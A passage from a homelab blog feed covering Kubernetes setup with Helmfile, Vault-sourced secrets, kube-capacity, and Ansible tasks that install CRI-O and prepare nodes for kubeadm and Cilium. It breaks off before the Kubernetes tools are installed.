This also uses Helm in the background, but has a central config file to combine
all the things I&rsquo;ve currently got deployed in my cluster, and it allows
deployment of all of it with a single command. Exactly what I was looking for.</p>
<p>Currently, with Traefik Ingress I set up myself, and using the <a href="https://rook.io/">Ceph Rook</a>
Helm chart, my Helmfile looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">repositories</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-release</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">url</span>: <span style="color:#ae81ff">https://charts.rook.io/release</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">releases</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-rook-operator</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">rook-release/rook-ceph</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">v1.12.5</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-ceph</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./value-files/rook-operator.yaml</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">ceph-rook-cluster-internal</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">rook-release/rook-ceph-cluster</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">version</span>: <span style="color:#ae81ff">v1.12.5</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">rook-ceph-cluster-internal</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">./value-files/rook-ceph-cluster-internal.yaml</span>
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">traefik</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">chart</span>: <span style="color:#ae81ff">./traefik</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">namespace</span>: <span style="color:#ae81ff">traefik-ingress</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">values</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">appVersion</span>: <span style="color:#e6db74">&#34;v2.10.4&#34;</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">meiHomeNetCert</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">chain</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            {{- &#34;ref+vault://secret/cert#/foo&#34; | fetchSecretValue | nindent 12 }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: |<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">            {{- &#34;ref+vault://secret/cert#/bar&#34; | fetchSecretValue | nindent 12 }}</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">basicAuthAdminPw</span>: {{ <span style="color:#e6db74">&#34;ref+vault://secret/traefik/auth/baz#/pw&#34;</span> <span style="color:#ae81ff">| fetchSecretValue }}</span>
</span></span></code></pre></div><p>This format has several nice features. Each entry in the <code>releases</code> array is a
different Helm chart. As you can see, for the Ceph Rook charts I use the official
sources, while the Traefik chart comes from a local directory as I wrote it
myself. I will write separate blog posts about both, Traefik as Ingress and
Ceph Rook.
Besides defining which charts to apply, you can also centrally define the
namespaces and values. Here I&rsquo;m using two different ways of defining values
for the Helm charts. For the Ceph Rook deployments, I&rsquo;m using separate value
files, because they need a lot of config. But Traefik&rsquo;s values I just define
directly inside the Helmfile.</p>
<p>Another big plus is Helmfile&rsquo;s ability to get secrets from Vault, which
I use here to get at my Let&rsquo;s Encrypt certs.</p>
<p>Levels of templating: Two. Helmfile&rsquo;s own, and then Helm&rsquo;s to generate the
actual Manifests.</p>
<p>While working on this and complaining a bit on Mastodon about the fact that Pods
are not restarted when the config file changes, I was pointed towards
a neat trick which can be applied when deploying with Helm. This trick uses the
fact that when an annotation of a Pod changes, the Pod is automatically redeployed.</p>
<p>Let&rsquo;s say we have a Deployment with a <code>spec.template</code> like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">homelab/name</span>: <span style="color:#e6db74">&#34;traefik&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">checksum/static-conf</span>: {{ <span style="color:#ae81ff">include (print $.Template.BasePath &#34;/static-conf.yml&#34;) . | sha256sum }}</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">containers</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">traefik</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">image</span>: <span style="color:#ae81ff">traefik:{{ .Values.appVersion }}</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">volumeMounts</span>:
</span></span><span style="display:flex;"><span>            - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">static-conf</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">mountPath</span>: <span style="color:#e6db74">&#34;/etc/traefik&#34;</span>
</span></span><span style="display:flex;"><span>              <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">volumes</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">static-conf</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">configMap</span>:
</span></span><span style="display:flex;"><span>            <span style="color:#f92672">name</span>: <span style="color:#ae81ff">traefik-static-conf</span>
</span></span></code></pre></div><p>And then we have a ConfigMap like this at <code>templates/static-conf.yml</code>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ConfigMap</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">traefik-static-conf</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/name</span>: <span style="color:#e6db74">&#34;traefik&#34;</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">range $label, $value := .Values.commonLabels }}</span>
</span></span><span style="display:flex;"><span>    {{ <span style="color:#f92672">$label }}</span>: {{ <span style="color:#ae81ff">$value | quote }}</span>
</span></span><span style="display:flex;"><span>    {{- <span style="color:#ae81ff">end }}</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">traefik.yml</span>: <span style="color:#ae81ff">|</span>
</span></span><span style="display:flex;"><span>{{ <span style="color:#ae81ff">tpl (.Files.Get &#34;configs/static.yml&#34;) . | indent 4 }}</span>
</span></span></code></pre></div><p>Then, whenever this ConfigMap, or the <code>configs/static.yml</code> referenced in the
<code>tpl</code> function, change content, the annotation on the Deployment&rsquo;s template
also changes, and the Pod is redeployed. This way, the Pod is automatically
restarted when the config file is changed.</p>
<p>You can also see another nice point about using Helmfile, at least with local
Helm charts you create yourself: I can set central, common labels to be set
on all resources.</p>
<h1 id="secrets">Secrets</h1>
<p>One little story about Secrets I need to tell here: I got myself utterly
confused about how Secrets work. For some reason, I got it into my head for
several days that with Secrets being stored just in plain text (okay, base64
encoded), they were a security risk. Going from that, I also felt that things like
<a href="https://external-secrets.io/latest/">external-secrets</a> wouldn&rsquo;t add anything -
yes, it takes the secrets from e.g. Vault, but then they are again stored
unencrypted in the cluster.</p>
<p>But of course that&rsquo;s a misconception. Secrets cannot just randomly be accessed
by anything running in a Kubernetes cluster, which was my initial impression. They
require access via the Kubernetes API server, which can be controlled via
<a href="https://kubernetes.io/docs/reference/access-authn-authz/rbac/">RBAC</a>. So for
now at least, I decided to rely on Helmfile&rsquo;s <a href="https://github.com/helmfile/vals">Vals</a>
to extract the secrets from Vault at deployment time. This just looks simpler
than setting up e.g. external-secrets.
I also see an, albeit small, security advantage here, because I don&rsquo;t need to
configure anything with broad access to my Vault instance in the cluster. Instead,
I can rely on Vault&rsquo;s login mechanisms on my Command and Control host, which
uses time limited tokens and such.</p>
<h1 id="showing-cluster-resource-usage">Showing cluster resource usage</h1>
<p>I was also all the time looking for some place where I could see how much capacity
I still had free in my experimental cluster. This is something which Nomad has
baked into its web UI, but Kubernetes does not have anything like it out of the
box.</p>
<p>I was finally pointed towards <a href="https://github.com/robscott/kube-capacity">kube-capacity</a>,
a kubectl plugin. It does exactly what I wanted, telling me how much free capacity
I still have left on the cluster and individual node level. The output looks
something like this at the moment:</p>
<pre tabindex="0"><code>kubectl resource-capacity
NODE     CPU REQUESTS   CPU LIMITS     MEMORY REQUESTS   MEMORY LIMITS
*        17600m (44%)   31100m (77%)   27551Mi (58%)     46408Mi (98%)
mehen    2150m (53%)    3000m (75%)    1524Mi (43%)      3472Mi (98%)
mesta    1950m (48%)    3000m (75%)    1384Mi (39%)      3132Mi (88%)
min      1950m (48%)    3000m (75%)    1384Mi (39%)      3132Mi (88%)
nakith   4450m (74%)    9300m (155%)   9660Mi (87%)      15008Mi (136%)
naunet   5350m (89%)    9900m (165%)   10472Mi (95%)     16032Mi (145%)
sait     950m (11%)     1200m (15%)    1619Mi (22%)      2560Mi (35%)
sehith   800m (10%)     1700m (21%)    1508Mi (20%)      3072Mi (42%)
</code></pre><p>This shows me that all of my current pod&rsquo;s requests together use 44% of the
available CPU capacity and 58% of the memory capacity. It has already been
pretty useful for figuring out why I wasn&rsquo;t able to deploy all of my Ceph Rook
pods, for example.</p>
<h1 id="thanks-to-the-homelabbers-in-the-fediverse">Thanks to the Homelabbers in the Fediverse</h1>
<p>Kubernetes is a pretty complex topic, as I have now found out. There are a lot
of pitfalls and great tools to avoid them which I might never have found just
from Googling. The Fediverse homelabbing community has been extremely helpful
in pointing me in the right direction multiple times, e.g. in recommending
Helmfile and kube-capacity to me.</p>
<p>Thanks everyone! :slight_smile:</p>
]]></content:encoded>
    </item>
    <item>
      <title>KubeExp: Setting up the cluster</title>
      <link>https://blog.mei-home.net/posts/kubernetes-cluster-setup/</link>
      <pubDate>Sat, 07 Oct 2023 00:05:34 +0200</pubDate>
      <guid>https://blog.mei-home.net/posts/kubernetes-cluster-setup/</guid>
      <description>Setting up a bare-metal cluster with Cilium and kubeadm</description>
      <content:encoded><![CDATA[<p>After setting up my lab environment in the <a href="https://blog.mei-home.net/posts/kubernetes-lab-setup/">previous article</a>,
I&rsquo;ve now also set up the Kubernetes cluster itself, with <a href="https://kubernetes.io/docs/reference/setup-tools/kubeadm/">kubeadm</a>
as the setup tool and <a href="https://cilium.io/">Cilium</a> as the CNI plugin for
networking.</p>
<p>Here, I will describe why I chose the tools I did, and how I initialized the
cluster, as well as how to remove the cluster when necessary.</p>
<h1 id="tools-choice">Tools choice</h1>
<p>Before setting up a cluster, several choices need to be made. The first one in
the case of Kubernetes is which distribution to use.</p>
<p>The first one, and the one I chose, is &ldquo;vanilla&rdquo; k8s. This is the default distribution,
with full support for all the related standards and functionality.</p>
<p>Another well-liked one is <a href="https://k3s.io/">k3s</a>, which bills itself as a
lightweight distribution. Its most distinguishing feature seems to be the
fact that its control plane comes along as a single binary, instead of an entire
set, as in the case of vanilla k8s.
Also in contrast to k8s, it uses a simple SQLite database as a storage backend
for cluster data, instead of a full <code>etcd</code> cluster.
It also falls into the &ldquo;opinionated&rdquo; part of the tech spectrum. Instead of
telling you to make a choice on things like CNI and CRI, it already comes
with some options out of the box. Flannel is pre-chosen as a CNI plugin,
while e.g. Traefik is already set up as an <a href="https://kubernetes.io/docs/concepts/services-networking/ingress-controllers/">Ingress Controller</a>.</p>
<p>If you want to go even further from vanilla, there&rsquo;s also things like
<a href="https://www.talos.dev/">Talos Linux</a>. It&rsquo;s an entire Linux distro made with
only one goal: Running a Kubernetes cluster. It doesn&rsquo;t even allow you to
SSH into it.</p>
<p>For now, I will stay with vanilla k8s, which I will install with <code>kubeadm</code>. Simply
because I like making the &ldquo;vanilla&rdquo; experience my first contact with some tech.
I also prefer being forced to make my own decisions on tools, so that I am forced
to inform myself about the alternatives. Once I&rsquo;ve completed my current experimentation,
I will likely at least take another look at Talos OS. Its premise sounds quite
interesting, especially with the declarative config files, but the &ldquo;no SSH&rdquo;
is honestly somewhat weird for me.</p>
<p>The next choice to be made is the <a href="https://kubernetes.io/docs/concepts/architecture/cri/">CRI</a>,
the container runtime. The only thing I knew going into this is that I did not
want to go with <em>Docker</em>. Too many bad experiences with memory leaks and other
shenanigans with their daemon. After some research, my choice fell on
<a href="https://cri-o.io/">CRI-O</a>. To be honest, mostly because it bills itself as
a container engine focused on use with Kubernetes.</p>
<p>Next is the <a href="https://kubernetes.io/docs/concepts/extend-kubernetes/compute-storage-net/network-plugins/">CNI plugin</a>.
This is the piece of the Kubernetes stack which controls networking, most
importantly inter-Pod networking. With this, I had my biggest problem to choose.
The websites of all of them are chock-full of buzzwords. eBPF! It&rsquo;s better than
sliced bread! &#x1f612; In the end, my decision was between <a href="https://cilium.io/">Cilium</a>
and <a href="https://www.tigera.io/project-calico/">Calico</a>. The one thing I was really
interested in and I definitely wanted was <a href="https://kubernetes.io/docs/concepts/services-networking/network-policies/">Network Policies</a>. Those allow defining rules for inter-Pod connectivity,
allowing me to define which pods can talk with each other. I like having this
for the sake of security, so that e.g. only the apps which actually need a DB
can talk to the Postgres pod.
In my current HashiCorp Nomad based cluster, I&rsquo;ve got something similar using
Consul&rsquo;s service mesh.
One more thing I find pretty nice is that both Calico and Cilium support
encryption. This was another reason for why I started using Consul: It provides
me with encrypted network traffic, without me having to setup TLS certs for
each individual service.
In the end, even after reading through most of the docs for both Calico and Cilium,
I didn&rsquo;t know which one to choose. So I did the obvious thing:</p>
<figure>
    <img loading="lazy" src="dice.png"
         alt="A picture of a 20 sided dice with the number 16 on the upper face."/> <figcaption>
            <p>When in doubt, just ask Principal Lead Architect Dice for their opinion.</p>
        </figcaption>
</figure>

<p>And that&rsquo;s how I came to use Cilium as the CNI plugin in my cluster. &#x1f605;</p>
<p>Without further ado, let&rsquo;s conjure ourselves a Kubernetes cluster. &#x1f913;</p>
<h1 id="preparing-the-machines">Preparing the machines</h1>
<p>Before we can actually call <code>kubeadm init</code>, we need to install the tools on the
machines and do some additional config. For most of the setup, I followed the
<a href="https://kubernetes.io/docs/setup/production-environment/tools/kubeadm/">official Kubernetes kubeadm docs</a>.</p>
<p>Before installing the tools, a couple of config options need to be set on the
machines, defined <a href="https://kubernetes.io/docs/setup/production-environment/container-runtimes/#forwarding-ipv4-and-letting-iptables-see-bridged-traffic">here</a>.</p>
<p>I configured the options using Ansible:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">load overlay kernel module</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kernel</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">community.general.modprobe</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">overlay</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">persistent</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">load br_netfilter kernel module</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kernel</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">community.general.modprobe</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">br_netfilter</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">persistent</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">enable ipv4 netfilter on bridge interfaces</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kernel</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.posix.sysctl</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">net.bridge.bridge-nf-call-iptables</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">enable ipv6 netfilter on bridge interfaces</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kernel</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.posix.sysctl</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">net.bridge.bridge-nf-call-ip6tables</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">enable ipv4 forwarding</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kernel</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.posix.sysctl</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">net.ipv4.ip_forward</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">value</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span></code></pre></div><p>This takes care of the pre-config. But if you&rsquo;re using the Ubuntu cloud image,
for example with LXD VMs, you also need to switch to a different kernel to
later be able to make use of Cilium as the CNI plugin.</p>
<h2 id="fun-with-ubuntus-cloud-images">Fun with Ubuntu&rsquo;s cloud images</h2>
<p>When I started up the cluster and went to install Cilium, its containers went
into a crash loop, due to the Ubuntu cloud image kernel, which is specialized
for use with e.g. KVM, not having all Kernel modules available. For me,
the kernel installed was <code>linux-image-kvm</code>. The Cilium docs have a <a href="https://docs.cilium.io/en/stable/operations/system_requirements/#base-requirements">page detailing
the required kernel config</a>.
I initially thought: Those will be fulfilled by any decently current kernel.
But I was wrong, the <code>-kvm</code> variant of Ubuntu&rsquo;s kernel seems to be lacking
some of the configs.</p>
<p>To fix this, I then needed to switch to the <code>-generic</code> kernel. Naively, I
again thought: How difficult could it possibly be? And I just ran
<code>apt remove linux-image-5.15.0-1039-kvm</code>. That did not have the hoped for effect.
Instead, it tried to remove that image and then install <code>linux-image-unsigned-5.15.0-1039-kvm</code>.
Which would not have been too useful. Finally, I followed <a href="https://discuss.linuxcontainers.org/t/usb-passthrough-on-ubuntu-based-vms/12170">this tutorial</a>, but decided to install the <code>-generic</code>
kernel, instead of the <code>-virtual</code> one.</p>
<h2 id="installing-and-setting-up-cri-o">Installing and setting up CRI-O</h2>
<p>As noted above, <a href="https://cri-o.io/">cri-o</a> is my container interface of choice.
To install it, several additional APT repos need to be added. I will only show
the Ansible setup for one of them here. First, we need the public keys for the
repos, which I normally just download and then store in my Homelab repo. Before
storing the keys, you should pipe them through <code>gpg --dearmor</code>.</p>
<p>Setting up the keys then simply means copying them into the right directory,
where apt can find them:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add libcontainers cri-o repo key</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">copy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">src</span>: <span style="color:#ae81ff">libcontainers-crio-keyring.gpg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/usr/share/keyrings/libcontainers-crio-keyring.gpg</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#ae81ff">0644</span>
</span></span></code></pre></div><p>Once that&rsquo;s done, we can set up the actual repo:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">add libcontainers cri-o ubuntu repo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">apt_repository</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">repo</span>: &gt;<span style="color:#e6db74">
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      deb [signed-by=/usr/share/keyrings/libcontainers-crio-keyring.gpg]
</span></span></span><span style="display:flex;"><span><span style="color:#e6db74">      https://download.opensuse.org/repositories/devel:/kubic:/libcontainers:/stable:/cri-o:/1.27/xUbuntu_22.04/ /</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">filename</span>: <span style="color:#ae81ff">libcontainers-crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">register</span>: <span style="color:#ae81ff">libcontainers_ubuntu_repo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">when</span>: <span style="color:#ae81ff">ansible_facts[&#39;distribution&#39;] == &#39;Ubuntu&#39;</span>
</span></span></code></pre></div><p>As you can see, I&rsquo;m only adding the specific Ubuntu repo if the distribution
actually is Ubuntu.
Please note that I&rsquo;ve only shown one additional repo, but there&rsquo;s another one
which needs to be added in a similar way.</p>
<p>Finally, we can install cri-o:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">create cri-o config dir</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.file</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">path</span>: <span style="color:#ae81ff">/etc/crio</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">directory</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;755&#39;</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install cri-o config file</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.copy</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">dest</span>: <span style="color:#ae81ff">/etc/crio/crio.conf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">src</span>: <span style="color:#ae81ff">crio.conf</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">group</span>: <span style="color:#ae81ff">root</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">mode</span>: <span style="color:#e6db74">&#39;644&#39;</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">install cri-o</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.apt</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">cri-o</span>
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">cri-o-runc</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">present</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">install_recommends</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>- <span style="color:#f92672">name</span>: <span style="color:#ae81ff">autostart cri-o</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">tags</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#ae81ff">kubernetes</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ansible.builtin.systemd_service</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">crio</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">state</span>: <span style="color:#ae81ff">started</span>
</span></span></code></pre></div><p>One weird thing which tripped me up in the beginning was that cri-o needs <code>runc</code>,
but it doesn&rsquo;t come with a dependency on <code>cri-o-runc</code>.</p>
<p>The config file I&rsquo;m using for cri-o is pretty simple, as <a href="https://github.com/cri-o/cri-o/blob/main/docs/crio.conf.5.md">the defaults</a> were mostly fine for me.</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-toml" data-lang="toml"><span style="display:flex;"><span>[<span style="color:#a6e22e">crio</span>.<span style="color:#a6e22e">runtime</span>]
</span></span><span style="display:flex;"><span><span style="color:#a6e22e">cgroup_manager</span> = <span style="color:#e6db74">&#34;systemd&#34;</span>
</span></span></code></pre></div><p>So at least for now, I just make sure that <code>systemd</code> is set as the cgroup
manager, as the CRI&rsquo;s and the kubelet&rsquo;s cgroup manager need to be the same.</p>
<h2 id="installing-the-kubernetes-tools">Installing the Kubernetes tools</h2>
<p>Finally, we need to install a couple of Kubernetes tools. First, similar to above,
we need to add the Kubernetes APT repo at <code>pkgs.k8s.io</code>. Then we can install
the three necessary Kubernetes tools:</p>
